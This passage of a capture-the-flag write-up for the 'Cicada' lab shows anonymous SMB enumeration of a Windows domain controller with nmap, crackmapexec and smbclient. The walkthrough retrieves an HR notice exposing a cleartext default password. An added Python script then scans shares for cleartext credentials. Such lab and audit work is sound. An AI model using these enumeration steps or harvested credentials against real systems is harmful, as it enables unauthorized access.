SMB


Nmap discovered a Windows Directory service on target ports 139 and 445.

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ nmap -Pn --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-28 21:33 CEST
Nmap scan report for cicada-dc.cicada.htb (10.129.41.192)
Host is up (0.051s latency).
 
PORT    STATE SERVICE       VERSION
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.81 seconds

Attempting to map the SMB shares failed, likely due to a lack of privileges.

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u ' ' -p ' ' --shares
SMB         10.129.41.192   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.41.192   445    CICADA-DC        [+] cicada.htb\ :
SMB         10.129.41.192   445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED

N/A

Null Session


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient -L //cicada-dc.cicada.htb/
Password for [WORKGROUP\kali]:
 
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk
        HR              Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to cicada-dc.cicada.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The target SMB server allows anonymous authentication and I am able to list the shares. The following shares are non-default:

  • //cicada-dc.cicada.htb/DEV
  • //cicada-dc.cicada.htb/HR

//cicada-dc.cicada.htb/DEV


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient //cicada-dc.cicada.htb/DEV
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Listing the DEV share fails with NT_STATUS_ACCESS_DENIED.

//cicada-dc.cicada.htb/HR


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient //cicada-dc.cicada.htb/HR
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024
 
                4168447 blocks of size 4096. 267108 blocks available

There is a single text file: Notice from HR.txt

Notice from HR.txt


smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (10.8 KiloBytes/sec) (average 10.8 KiloBytes/sec)

Downloading it to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat Notice\ from\ HR.txt           
 
Dear new hire!
 
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
 
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
 
To change your password:
 
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
 
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
 
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
 
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
 
Best regards,
Cicada Corp

The txt file contains a CLEARTEXT default credential: Cicada$M6Corpb*@Lp#nZp!8
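From the share owner's side, the finding above is something an audit of a locally mounted share can catch. The following is an added example, not part of the original write-up: it walks a directory, flags lines that state a password in cleartext, and redacts the value in its report. The regex, suffix list, size limit and sample notice are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed pattern: a password keyword followed by ':' or '=' and a value on the same line.
CRED_PATTERN = re.compile(
    r"\b(?:default\s+|temporary\s+|initial\s+)?(?:password|passwd|pwd)\b"
    r"(?:\s+is)?\s*[:=]\s*(\S+)", re.IGNORECASE
)
TEXT_SUFFIXES = {".txt", ".md", ".csv", ".ini", ".cfg", ".xml", ".ps1", ".bat"}
MAX_BYTES = 1_000_000  # notices and scripts are small; skip anything larger


def redact(secret: str) -> str:
    """Keep the first two characters so a finding is recognisable but not reusable."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_share(root: Path) -> list[tuple[str, int, str]]:
    """Return (relative path, line number, redacted value) for every hit under root."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        if path.stat().st_size > MAX_BYTES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            for match in CRED_PATTERN.finditer(line):
                rel = path.relative_to(root).as_posix()
                findings.append((rel, lineno, redact(match.group(1))))
    return findings


def demo() -> list[tuple[str, int, str]]:
    """Build a constructed share layout in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "HR").mkdir()
        (root / "HR" / "Notice from HR.txt").write_text(  # constructed sample notice
            "Dear new hire!\n\nYour default password is: Example$Placeholder1!\n"
            "Please do not share your password with anyone.\n", encoding="utf-8")
        (root / "HR" / "holiday.txt").write_text("Office closed Friday.\n", encoding="utf-8")
        return scan_share(root)


if __name__ == "__main__":
    for rel, lineno, secret in demo():
        print(f"{rel}:{lineno}: cleartext credential {secret}")
```

Only the line that states the value is reported; the later sentence that merely mentions "password" is not.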